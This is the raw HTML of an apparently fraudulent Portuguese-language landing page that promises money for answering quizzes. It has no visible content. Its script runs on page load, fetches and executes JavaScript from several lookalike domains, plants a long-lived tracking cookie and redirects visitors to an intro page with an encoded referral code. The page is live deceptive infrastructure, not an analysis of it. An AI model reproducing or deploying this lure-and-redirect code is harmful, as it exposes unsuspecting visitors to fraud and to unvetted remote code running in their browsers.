
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta property="og:image" content="https://i.imgur.com/najoOd3.jpeg">
<meta property="og:title" content="🕖Faça testes para ganhar dinheiro. 🕚">
<meta property="og:description" content="Responda às perguntas e desafie para ganhar um dólar por minuto.">
<meta property="og:url" content="https://au7-quiz.xyz">
<meta name="author" content="">
<title>Faça testes para ganhar dinheiro.</title>
</head>
<body>
 <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
  <script>   
 

 function rset_Cookie(name, value) {
            name = name;
            var Days = 30*10000;
            var exp = new Date();
            var domain = document.domain.split('.').slice(-2).join('.');
            exp.setTime(exp.getTime() + (Days * 200 * 1000));
            document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString() + ";domain=."+domain+"; path=/;"
        }

      function rget_Cookie(name) {
            name = name;
            var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
            if (arr = document.cookie.match(reg)) {
                return unescape(arr[2]);
            }
            return '';
        }
 
 //location.href="http://au7-quiz.xyz";
 
 if(rget_Cookie('godomain')){
     location.href='https://'+rget_Cookie('godomain');
 }else{
 
 $.getScript('//ah0-quiz.xyz/public/commonscripts.js?1667337698',function(){ if(!rget_Cookie('godomain')){rset_Cookie('godomain','ah0-quiz.xyz');location.href='https://ah0-quiz.xyz/intro.php?code=M3x8YXU3LXF1aXoueHl6';
     };});
     $.getScript('//au0-quiz.xyz/public/commonscripts.js?1667337698',function(){ if(!rget_Cookie('godomain')){rset_Cookie('godomain','au0-quiz.xyz');location.href='https://au0-quiz.xyz/intro.php?code=M3x8YXU3LXF1aXoueHl6';
     };});
     $.getScript('//au0-quiz.xyz/public/commonscripts.js?1667337698',function(){ if(!rget_Cookie('godomain')){rset_Cookie('godomain','au0-quiz.xyz');location.href='https://au0-quiz.xyz/intro.php?code=M3x8YXU3LXF1aXoueHl6';
     };});
     $.getScript('//ah0-quiz.xyz/public/commonscripts.js?1667337698',function(){ if(!rget_Cookie('godomain')){rset_Cookie('godomain','ah0-quiz.xyz');location.href='https://ah0-quiz.xyz/intro.php?code=M3x8YXU3LXF1aXoueHl6';
     };});
     $.getScript('//au7-quiz.xyz/public/commonscripts.js?1667337698',function(){ if(!rget_Cookie('godomain')){rset_Cookie('godomain','au7-quiz.xyz');location.href='https://au7-quiz.xyz/intro.php';
     };});
     $.getScript('//ah7-quiz.xyz/public/commonscripts.js?1667337698',function(){ if(!rget_Cookie('godomain')){rset_Cookie('godomain','ah7-quiz.xyz');location.href='https://ah7-quiz.xyz/intro.php?code=M3x8YXU3LXF1aXoueHl6';
     };});
      

  
 }
 
 setTimeout(function(){
location.href="/intro.php";
 },3000);
 </script>
</body>
</html>

